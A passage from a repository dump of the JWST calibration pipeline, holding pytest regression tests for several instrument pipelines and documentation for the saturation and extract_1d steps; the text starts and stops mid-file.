**fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\nfile_roots = ['exptype_fgs_acq1', 'exptype_fgs_fineguide', 'exptype_fgs_id_image', 'exptype_fgs_id_stack']\[email protected](scope='module', params=file_roots, ids=file_roots)\ndef run_guider_pipelines(jail, rtdata_module, request):\n \"\"\"Run pipeline for guider data\"\"\"\n rtdata = rtdata_module\n rtdata.get_data('fgs/level1b/' + request.param + 
'_uncal.fits')\n\n collect_pipeline_cfgs('config')\n args = [\n 'config/calwebb_guider.cfg',\n rtdata.input,\n '--steps.dq_init.save_results=true',\n '--steps.guider_cds.save_results=true',\n ]\n Step.from_cmdline(args)\n\n return rtdata\n\nguider_suffixes = ['cal', 'dq_init', 'guider_cds']\[email protected]\[email protected]('suffix', guider_suffixes, ids=guider_suffixes)\ndef test_fgs_guider(run_guider_pipelines, fitsdiff_default_kwargs, suffix):\n \"\"\"Regression for FGS Guider data\"\"\"\n is_like_truth(run_guider_pipelines, fitsdiff_default_kwargs, suffix)\n" }, { "alpha_fraction": 0.6110349297523499, "alphanum_fraction": 0.6282578706741333, "avg_line_length": 34.65760803222656, "blob_id": "9362c73a68fab2dd0ff994918a09804806ce560c", "content_id": "34825ee08da9aed5e012cadeb824837f8b41f895", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6561, "license_type": "permissive", "max_line_length": 98, "num_lines": 184, "path": "/jwst/regtest/test_miri_mrs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Regression tests for MIRI MRS modes\"\"\"\nfrom pathlib import Path\nimport pytest\n\nfrom numpy.testing import assert_allclose\nfrom jwst.associations import load_asn\nfrom jwst.lib.suffix import replace_suffix\nfrom jwst import datamodels\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom . import regtestdata as rt\n\n# Define artifactory source and truth\nINPUT_PATH = 'miri/mrs'\nTRUTH_PATH = 'truth/test_miri_mrs'\n\n\[email protected](scope='module')\ndef run_spec2(jail, rtdata_module):\n \"\"\"Run the Spec2Pipeline on a single exposure\"\"\"\n rtdata = rtdata_module\n\n # Setup the inputs\n asn_name = 'ifushort_ch12_rate_asn3.json'\n rtdata.get_data(INPUT_PATH + '/' + asn_name)\n asn_path = rtdata.input\n with open(asn_path, 'r') as asn_fh:\n asn = load_asn(asn_fh)\n member_path = Path(asn['products'][0]['members'][0]['expname'])\n rate_path = member_path.stem\n rate_path = replace_suffix(rate_path, 'rate')\n rate_path = INPUT_PATH + '/' + rate_path + member_path.suffix\n\n # Run the pipeline\n step_params = {\n 'input_path': rate_path,\n 'step': 'calwebb_spec2.cfg',\n 'args': [\n '--steps.bkg_subtract.save_results=true',\n '--steps.assign_wcs.save_results=true',\n '--steps.imprint_subtract.save_results=true',\n '--steps.msa_flagging.save_results=true',\n '--steps.extract_2d.save_results=true',\n '--steps.flat_field.save_results=true',\n '--steps.srctype.save_results=true',\n '--steps.straylight.save_results=true',\n '--steps.fringe.save_results=true',\n '--steps.pathloss.save_results=true',\n '--steps.barshadow.save_results=true',\n '--steps.photom.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n ]\n }\n\n rtdata = rt.run_step_from_dict(rtdata, **step_params)\n return rtdata, asn_path\n\n\[email protected](scope='module')\ndef run_spec3(jail, run_spec2):\n \"\"\"Run the Spec3Pipeline on the results from the Spec2Pipeline run\"\"\"\n rtdata, asn_path = run_spec2\n\n # The presumption is that `run_spec2` has set the input to the\n # original association. 
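    # (Aside, for readers of this test: the association JSON loaded in
    # `run_spec2` has the nested shape
    # {"products": [{"members": [{"expname": "..."}, ...]}]},
    # which is why that fixture reaches into asn['products'][0]['members'][0].)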
To use this default, and not re-download\n # the association, simply do not specify `step_params[\"input_path\"]`\n rtdata.input = asn_path\n step_params = {\n 'step': 'calwebb_spec3.cfg',\n 'args': [\n '--steps.master_background.save_results=true',\n '--steps.mrs_imatch.save_results=true',\n '--steps.outlier_detection.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n '--steps.combine_1d.save_results=true',\n ]\n }\n\n return rt.run_step_from_dict(rtdata, **step_params)\n\n\[email protected](scope='module')\ndef run_spec3_multi(jail, rtdata_module):\n \"\"\"Run the Spec3Pipeline on multi channel/multi filter data\"\"\"\n step_params = {\n 'input_path': INPUT_PATH + '/' + 'ifushort_set2_asn3.json',\n 'step': 'calwebb_spec3.cfg',\n 'args': [\n '--steps.master_background.save_results=true',\n '--steps.mrs_imatch.save_results=true',\n '--steps.outlier_detection.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n '--steps.combine_1d.save_results=true',\n ]\n }\n\n return rt.run_step_from_dict(rtdata_module, **step_params)\n\n\[email protected]\[email protected](\n 'suffix',\n ['assign_wcs', 'cal', 'flat_field', 'fringe', 'photom', 's3d', 'srctype', 'straylight', 'x1d']\n)\ndef test_spec2(run_spec2, fitsdiff_default_kwargs, suffix):\n \"\"\"Test ensuring the callwebb_spec2 is operating appropriately for MIRI MRS data\"\"\"\n rtdata, asn_path = run_spec2\n rt.is_like_truth(rtdata, fitsdiff_default_kwargs, suffix,\n truth_path=TRUTH_PATH)\n\n\[email protected]\[email protected](\n 'output',\n [\n 'ifushort_ch12_spec3_mrs_imatch.fits',\n 'ifushort_ch12_spec3_ch1-medium_s3d.fits',\n 'ifushort_ch12_spec3_ch2-medium_s3d.fits',\n 'ifushort_ch12_spec3_ch1-medium_x1d.fits',\n 'ifushort_ch12_spec3_ch2-medium_x1d.fits',\n ],\n ids=[\"mrs_imatch\", \"ch1-s3d\", \"ch2-s3d\", \"ch1-x1d\", \"ch2-x1d\"]\n)\ndef test_spec3(run_spec3, fitsdiff_default_kwargs, output):\n \"\"\"Regression test matching output files\"\"\"\n rt.is_like_truth(\n run_spec3, fitsdiff_default_kwargs, output,\n truth_path=TRUTH_PATH,\n is_suffix=False\n )\n\n\[email protected]\[email protected](\n 'output',\n [\n 'ifushort_set2_0_mrs_imatch.fits',\n 'ifushort_set2_1_mrs_imatch.fits',\n 'ifushort_set2_0_a3001_crf.fits',\n 'ifushort_set2_1_a3001_crf.fits',\n 'ifushort_set2_ch1-short_s3d.fits',\n 'ifushort_set2_ch2-short_s3d.fits',\n 'ifushort_set2_ch1-short_x1d.fits',\n 'ifushort_set2_ch2-short_x1d.fits',\n ],\n ids=[\"ch1-mrs_imatch\", \"ch2-mrs_imatch\", \"ch1-crf\", \"ch2-crf\",\n \"ch1-s3d\", \"ch2-s3d\", \"ch1-x1d\", \"ch2-x1d\"]\n)\ndef test_spec3_multi(run_spec3_multi, fitsdiff_default_kwargs, output):\n \"\"\"Regression test matching output files\"\"\"\n rt.is_like_truth(\n run_spec3_multi, fitsdiff_default_kwargs, output,\n truth_path=TRUTH_PATH,\n is_suffix=False\n )\n\n\[email protected]\ndef test_miri_mrs_wcs(run_spec2, fitsdiff_default_kwargs):\n rtdata, asn_path = run_spec2\n # get input assign_wcs and truth file\n output = \"ifushort_ch12_assign_wcs.fits\"\n rtdata.output = output\n rtdata.get_truth(f\"truth/test_miri_mrs/{output}\")\n\n # Open the output and truth file\n with datamodels.open(rtdata.output) as im, datamodels.open(rtdata.truth) as im_truth:\n x, y = grid_from_bounding_box(im.meta.wcs.bounding_box)\n ra, dec, lam = im.meta.wcs(x, y)\n ratruth, dectruth, lamtruth = im_truth.meta.wcs(x, y)\n assert_allclose(ra, 
ratruth)\n assert_allclose(dec, dectruth)\n assert_allclose(lam, lamtruth)\n\n # Test the inverse transform\n xtest, ytest = im.meta.wcs.backward_transform(ra, dec, lam)\n xtruth, ytruth = im_truth.meta.wcs.backward_transform(ratruth, dectruth, lamtruth)\n assert_allclose(xtest, xtruth)\n assert_allclose(ytest, ytruth)\n" }, { "alpha_fraction": 0.45127248764038086, "alphanum_fraction": 0.5406579971313477, "avg_line_length": 38.77777862548828, "blob_id": "ae0ceaae6f482b4b710fbc92ff42529fe1fea395", "content_id": "e35d667a6dcff13569c72ccf0e5472734831875d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6444, "license_type": "permissive", "max_line_length": 104, "num_lines": 162, "path": "/jwst/tests_nightly/general/miri/test_miri_spec2pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_spec2pipeline', 'truth']\n\n test_dir = 'test_spec2pipeline'\n\n def test_miri_lrs_bkgnod(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on an association\n of nodded MIRI LRS fixed-slit exposures.\n\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'lrs_bkgnod_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(asn_file)\n\n outputs = [('test_lrs1_bsub.fits', 'test_lrs1_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs2_bsub.fits','test_lrs2_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs3_bsub.fits','test_lrs3_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs4_bsub.fits','test_lrs4_bsub_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs1_cal.fits', 'test_lrs1_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs2_cal.fits', 'test_lrs2_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs3_cal.fits', 'test_lrs3_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('test_lrs4_cal.fits', 'test_lrs4_cal_ref.fits',\n ['primary','sci','err','dq'])\n ]\n self.compare_outputs(outputs)\n\n def test_miri_lrs_slit_1(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on a single\n MIRI LRS fixed-slit exposure.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_MIRIMAGE_rate.fits')\n\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw00035001001_01101_00001_MIRIMAGE_cal.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw00035001001_01101_00001_MIRIMAGE_x1d.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n\n def test_miri_lrs_slit_1b(self):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on a single\n MIRI LRS fixed-slit exposure with multiple integrations. 
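        Unlike the 2-D ``_cal`` product, the ``_calints`` product is a 3-D
        stack holding one calibrated plane per integration.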
Compare _calints.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_MIRIMAGE_rateints.fits')\n\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw00035001001_01101_00001_MIRIMAGE_calints.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_calints_ref.fits',\n ['primary','sci','err','dq']),\n ('jw00035001001_01101_00001_MIRIMAGE_x1dints.fits',\n 'jw00035001001_01101_00001_MIRIMAGE_x1dints_ref.fits',\n ['primary', ('extract1d', 1), ('extract1d', 2), ('extract1d', 3), ('extract1d', 4)]\n )\n ]\n self.compare_outputs(outputs)\n\n def test_mrs2pipeline1(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on MIRI MRS data.\n\n \"\"\"\n test_dir = 'test_mrs2pipeline'\n self.ref_loc = ['test_mrs2pipeline', 'truth']\n\n input_file = self.get_data(test_dir,\n 'jw80500018001_02101_00002_MIRIFUSHORT_rate.fits')\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw80500018001_02101_00002_MIRIFUSHORT_cal.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw80500018001_02101_00002_MIRIFUSHORT_s3d.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']),\n ('jw80500018001_02101_00002_MIRIFUSHORT_x1d.fits',\n 'jw80500018001_02101_00002_MIRIFUSHORT_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n\n def test_mrs_spec2(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on MIRI MRS data.\n\n \"\"\"\n self.rtol = 0.000001\n input_file = self.get_data(self.test_dir,\n 'jw10001001001_01101_00001_mirifushort_rate.fits')\n step = Spec2Pipeline()\n step.save_bsub=True\n step.save_results=True\n step.resample_spec.save_results = True\n step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n outputs = [('jw10001001001_01101_00001_mirifushort_cal.fits',\n 'jw10001001001_01101_00001_mirifushort_cal_ref.fits',\n ['primary','sci','err','dq']),\n ('jw10001001001_01101_00001_mirifushort_s3d.fits',\n 'jw10001001001_01101_00001_mirifushort_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']),\n ('jw10001001001_01101_00001_mirifushort_x1d.fits',\n 'jw10001001001_01101_00001_mirifushort_x1d_ref.fits',\n ['primary','extract1d'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.47878268361091614, "alphanum_fraction": 0.567509651184082, "avg_line_length": 31.859155654907227, "blob_id": "23de18d020f15fe24dcd19bb09b7180e18bab111", "content_id": "8c30aabb6c7b1bbb3b73789ed237aadf9616c6e2", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2333, "license_type": "permissive", "max_line_length": 87, "num_lines": 71, "path": "/jwst/tests_nightly/general/fgs/test_guider_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline.calwebb_guider import GuiderPipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestGuiderPipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_guiderpipeline', 'truth']\n test_dir = 'test_guiderpipeline'\n\n rtol = 0.000001\n\n def test_guider_pipeline1(self):\n \"\"\"\n Regression test of calwebb_guider pipeline performed 
on ID-image data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw88600073001_gs-id_7_image-uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw88600073001_gs-id_7_image-cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw88600073001_gs-id_7_image-cal.fits',\n 'jw88600073001_gs-id_7_image-cal_ref.fits',\n ['primary','sci','dq'])\n ]\n self.compare_outputs(outputs)\n\n\n def test_guider_pipeline2(self):\n \"\"\"\n Regression test of calwebb_guider pipeline performed on ACQ-1 data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw88600073001_gs-acq1_2016022183837_uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw88600073001_gs-acq1_2016022183837_cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw88600073001_gs-acq1_2016022183837_cal.fits',\n 'jw88600073001_gs-acq1_2016022183837_cal_ref.fits',\n ['primary','sci','dq'])\n\n ]\n self.compare_outputs(outputs)\n\n\n def test_guider_pipeline3(self):\n \"\"\"\n\n Regression test of calwebb_guider pipeline performed on ID STACKED data.\n\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw86600004001_gs-id_1_stacked-uncal.fits')\n\n GuiderPipeline.call(input_file,\n output_file='jw86600004001_gs-id_1_stacked-cal.fits')\n\n # Compare calibrated ramp product\n outputs = [('jw86600004001_gs-id_1_stacked-cal.fits',\n 'jw86600004001_gs-id_1_stacked-cal_ref.fits',\n ['primary','sci','dq'])\n\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.40420928597450256, "alphanum_fraction": 0.4931156635284424, "avg_line_length": 43.99114990234375, "blob_id": "513dcddf7d489f5627a601ae08d70a6e735bfc4d", "content_id": "97f9c9714d29cef6be2350461563abb225e5c619", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5084, "license_type": "permissive", "max_line_length": 87, "num_lines": 113, "path": "/jwst/tests_nightly/general/nircam/test_nircam_steps.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTestSteps\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\nfrom jwst.refpix import RefPixStep\nfrom jwst.dark_current import DarkCurrentStep\nfrom jwst.dq_init import DQInitStep\nfrom jwst.flatfield import FlatFieldStep\nfrom jwst.ipc import IPCStep\nfrom jwst.jump import JumpStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.persistence import PersistenceStep\nfrom jwst.photom import PhotomStep\nfrom jwst.saturation import SaturationStep\n\n\n# Parameterized regression tests for NIRCAM processing\n# All tests in this set run with 1 input file and\n# only generate 1 output for comparison.\n#\[email protected]\nclass TestNIRCamSteps(BaseJWSTTestSteps):\n input_loc = 'nircam'\n\n params = {'test_steps':\n [dict(input='jw00017001001_01101_00001_NRCA1_dq_init.fits',\n test_dir='test_bias_drift',\n step_class=RefPixStep,\n step_pars=dict(odd_even_columns=True,\n use_side_ref_pixels=False,\n side_smoothing_length=10,\n side_gain=1.0),\n output_truth='jw00017001001_01101_00001_NRCA1_bias_drift.fits',\n output_hdus=[],\n id='refpix_nircam'\n\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_saturation.fits',\n test_dir='test_dark_step',\n step_class=DarkCurrentStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_dark_current.fits',\n output_hdus=[],\n id='dark_current_nircam'\n\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_uncal.fits',\n test_dir='test_dq_init',\n 
step_class=DQInitStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_dq_init.fits',\n output_hdus=[],\n id='dq_init_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_ramp_fit.fits',\n test_dir='test_flat_field',\n step_class=FlatFieldStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_flat_field.fits',\n output_hdus=[],\n id='flat_field_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA3_uncal.fits',\n test_dir='test_ipc_step',\n step_class=IPCStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA3_ipc.fits',\n output_hdus=['primary', 'sci'],\n id='ipc_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_linearity.fits',\n test_dir='test_jump',\n step_class=JumpStep,\n step_pars=dict(rejection_threshold=25.0),\n output_truth='jw00017001001_01101_00001_NRCA1_jump.fits',\n output_hdus=[],\n id='jump_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_dark_current.fits',\n test_dir='test_linearity',\n step_class=LinearityStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_linearity.fits',\n output_hdus=[],\n id='linearity_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_ramp.fits',\n test_dir='test_persistence',\n step_class=PersistenceStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_persistence.fits',\n output_hdus=[],\n id='persistence_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_emission.fits',\n test_dir='test_photom',\n step_class=PhotomStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_photom.fits',\n output_hdus=[],\n id='photom_nircam'\n ),\n dict(input='jw00017001001_01101_00001_NRCA1_bias_drift.fits',\n test_dir='test_saturation',\n step_class=SaturationStep,\n step_pars=dict(),\n output_truth='jw00017001001_01101_00001_NRCA1_saturation.fits',\n output_hdus=[],\n id='saturation_nircam'\n ),\n ]\n }\n" }, { "alpha_fraction": 0.7882583141326904, "alphanum_fraction": 0.7917808294296265, "avg_line_length": 51.14285659790039, "blob_id": "4d34a6ddfe582c0b08081483c79ed6bdf6046896", "content_id": "fdf37b2ac3b63363b0f504a5d98362d1b22710f7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2555, "license_type": "permissive", "max_line_length": 93, "num_lines": 49, "path": "/docs/jwst/saturation/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n============\n\nThe ``saturation`` step flags saturated pixel values. It loops over all\nintegrations within an exposure, examining each one group-by-group, comparing the\npixel values in the SCI array with defined saturation thresholds for each pixel.\nWhen it finds a pixel value in a given group that is above the threshold, it\nsets the \"SATURATED\" flag in the corresponding location of the \"GROUPDQ\"\narray in the science exposure. It also flags all subsequent groups for that\npixel as saturated. For example, if there are 10 groups in an integration and\ngroup 7 is the first one to cross the saturation threshold for a given pixel,\nthen groups 7 through 10 will all be flagged for that pixel.\n\nNIRSpec data acquired using the \"IRS2\" readout pattern require special\nhandling in this step, due to the extra reference pixel values that are interleaved\nwithin the science data. The saturation reference file data does not contain\nextra entries for these pixels. 
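As an aside, the group-propagation rule illustrated earlier (group 7
saturates, so groups 7 through 10 are all flagged) can be sketched in a few
lines of NumPy. This is an illustration only, not the actual implementation;
the array shapes and threshold values are invented, and ``SATURATED = 2``
assumes the standard GROUPDQ bit value for this flag::

    import numpy as np

    SATURATED = 2  # assumed GROUPDQ bit value for the SATURATED flag

    # Invented example: 1 integration, 10 groups, 4x4 pixels
    data = np.random.uniform(0, 70000, size=(1, 10, 4, 4)).astype(np.float32)
    threshold = np.full((4, 4), 60000.0, dtype=np.float32)

    # Flag groups at or above the threshold, then propagate the flag to all
    # subsequent groups with a running maximum along the group axis
    flagged = np.where(data >= threshold, SATURATED, 0).astype(np.uint8)
    groupdq = np.maximum.accumulate(flagged, axis=1)
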
The step-by-step process is as follows:\n\n- Retrieve and load data from the appropriate \"SATURATION\" reference file from CRDS\n\n- If the input science exposure used the NIRSpec IRS2 readout pattern:\n\n * Create a temporary saturation array that is the same size as the IRS2 readout\n\n * Copy the saturation threshold values from the original reference data into\n the larger saturation array, skipping over the interleaved reference pixel\n locations within the array\n\n- If the input science exposure used a subarray readout, extract the matching\n subarray from the full-frame saturation reference file data\n\n- For pixels that contain NaN in the reference file saturation threshold array\n or are flagged in the reference file with \"NO_SAT_CHECK\" (no saturation check\n available), propagate the \"NO_SAT_CHECK\" flag to the science data PIXELDQ array\n\n- For each group in the input science data, set the \"SATURATION\" flag in the\n \"GROUPDQ\" array if the pixel value is greater than or equal to the saturation\n threshold from the reference file\n\nNote that pixels set to NaN or flagged as \"NO_SAT_CHECK\" in the saturation\nreference file do not receive any saturation checking by this step. They are\nsimply flagged as \"NO_SAT_CHECK\" in the output science data.\n\nSubarrays\n=========\nThe ``saturation`` step will accept either full-frame or subarray saturation reference files.\nIf only a full-frame reference file is available, the step will extract a\nsubarray to match that of the science exposure. Otherwise, subarray-specific\nsaturation reference files will be used if they are available.\n" }, { "alpha_fraction": 0.50157231092453, "alphanum_fraction": 0.5927672982215881, "avg_line_length": 36.411766052246094, "blob_id": "ad9bd7215ed89ab10125069541212a93e500fdfb", "content_id": "b9746a1cbb51f5a4a6a556fa90d4833f76ef37f1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "permissive", "max_line_length": 82, "num_lines": 34, "path": "/jwst/tests_nightly/general/nircam/test_image2pipeline_2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Image2Pipeline\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestImage2Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_image2pipeline', 'truth']\n\n def test_image2pipeline2_cal(self):\n \"\"\"\n Regression test of calwebb_image2 pipeline performed on NIRCam data.\n \"\"\"\n input_file = self.get_data('test_image2pipeline',\n 'jw82500001003_02101_00001_NRCALONG_rate.fits')\n output_file = 'jw82500001003_02101_00001_NRCALONG_cal.fits'\n\n collect_pipeline_cfgs('cfgs')\n Image2Pipeline.call(input_file,\n config_file='cfgs/calwebb_image2.cfg',\n output_file=output_file)\n\n outputs = [(output_file,\n 'jw82500001003_02101_00001_NRCALONG_cal_ref.fits',\n ['primary','sci','err','dq','area']),\n ('jw82500001003_02101_00001_NRCALONG_i2d.fits',\n 'jw82500001003_02101_00001_NRCALONG_i2d_ref.fits',\n ['primary','sci','con','wht'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.7838507294654846, "alphanum_fraction": 0.7888044714927673, "avg_line_length": 57.79611587524414, "blob_id": "aa4c585ab6bac013035f1dde63b16337b555efe8", "content_id": "bc350409069925a99a64b37df821ad398dd9a168", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, 
"language": "reStructuredText", "length_bytes": 6056, "license_type": "permissive", "max_line_length": 84, "num_lines": 103, "path": "/docs/jwst/extract_1d/description.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Description\n===========\nThe ``extract_1d`` step extracts a 1D signal from a 2D or 3D dataset and\nwrites a spectrum to a product. This works on all JWST spectroscopic\nmodes, including MIRI LRS (slit and slitless) and MRS, NIRCam WFSS and\nTSGRISM, NIRISS WFSS and SOSS, and NIRSpec fixed-slit, IFU, and MOS.\n\nAn EXTRACT1D reference file is used for most modes to specify the location and\nsize of the target and background extraction apertures.\nThe EXTRACT1D reference file is not used for Wide-Field Slitless Spectroscopy data\n(NIS_WFSS or NRC_WFSS). The extraction region is instead taken to be the full size\nof the input subarray or cutout, or restricted to the region within which the world\ncoordinate system (WCS) is defined.\n\nFor IFU data, the extraction options differ depending on\nwhether the target is a point source or an extended source. For a point\nsource, the spectrum is extracted using circular aperture photometry,\noptionally including background subtraction using a circular annulus.\nFor an extended source, rectangular aperture photometry is used, with\nthe entire image being extracted, and no background subtraction, regardless\nof what was specified in the reference file or command-line arguments.\nFor either point source or extended, the photometry makes use of astropy photutils.\nThe region of overlap between an aperture and a pixel can be calculated by\none of three different methods: \"exact\", limited only by finite precision\narithmetic; \"center\", i.e. the full value in a pixel will be included if its\ncenter is within the aperture; or \"subsample\", which means pixels will be\nsubsampled N x N, and the \"center\" option will be used for each sub-pixel.\n\nFor most spectral modes an aperture correction will be applied to the extracted\n1D spectral data (unless otherwise selected by the user), in order to put the\nresults onto an infinite aperture scale.\nThis is done by creating interpolation functions based on the APCORR reference\nfile data and applying the interpolated aperture correction (a multiplicative\nfactor between 0 and 1) to the extracted, 1D spectral data (corrected data\ninclude the \"flux\", \"surf_bright\", \"error\", and \"sb_error\" columns in the output\ntable).\n\nInput\n-----\nCalibrated and potentially resampled 2D images or 3D cubes. The format should be a\nCubeModel, SlitModel, IFUCubeModel, ImageModel, MultiSlitModel, or a ModelContainer.\nFor some JWST modes this is usually a resampled product, such as the \"i2d\" products\nfor MIRI LRS fixed-slit, NIRSpec fixed-slit, and NIRSpec MOS, or the \"s3d\" products\nfor MIRI MRS and NIRSpec IFU. For other modes that are not resampled (e.g. MIRI\nLRS slitless, NIRISS SOSS, NIRSpec BrightObj, and NIRCam and NIRISS WFSS), this will\nbe a \"cal\" product.\nFor modes that have multiple slit instances (NIRSpec fixed-slit and MOS, WFSS),\nThe SCI extensions should have keyword SLTNAME to specify which slit was extracted,\nthough if there is only one slit (e.g. MIRI LRS and NIRISS SOSS), the slit name can\nbe taken from the EXTRACT1D reference file instead.\n\nNormally the :ref:`photom <photom_step>` step should have been run before running\n``extract_1d``. 
If ``photom`` has not been run, a warning will be logged and the\noutput of ``extract_1d`` will be in units of count rate. The ``photom`` step\nconverts data to units of either surface brightness (MegaJanskys per steradian) or,\nfor point sources observed with NIRSpec and NIRISS SOSS, units of flux density\n(MegaJanskys).\n\nOutput\n------\nThe output will be in MultiSpecModel format. For each input slit there will\nbe an output table extension with the name EXTRACT1D. This extension will\nhave columns WAVELENGTH, FLUX, ERROR, SURF_BRIGHT, SB_ERROR, DQ,\nBACKGROUND, BERROR and NPIXELS.\nSome metadata will be written to the table header, mostly copied from the\ninput header.\n\nThe output WAVELENGTH data is copied from the wavelength array of the input 2D data,\nif that attribute exists and was populated, otherwise it is calculated from the WCS.\nFLUX is the flux density in Janskys; see keyword TUNIT2 if the data are\nin a FITS BINTABLE. ERROR is the error estimate for FLUX, and it has the\nsame units as FLUX.\nSURF_BRIGHT is the surface brightness in MJy / sr, except that for point\nsources observed with NIRSpec and NIRISS SOSS, SURF_BRIGHT will be set to\nzero, because there's no way to express the extracted results from those modes\nas a surface brightness. SB_ERROR is the error estimate for SURF_BRIGHT.\nWhile it's expected that a user will make use of the FLUX column for\npoint-source data and the SURF_BRIGHT column for an extended source,\nboth columns are populated (except for NIRSpec and NIRISS SOSS point sources,\nas 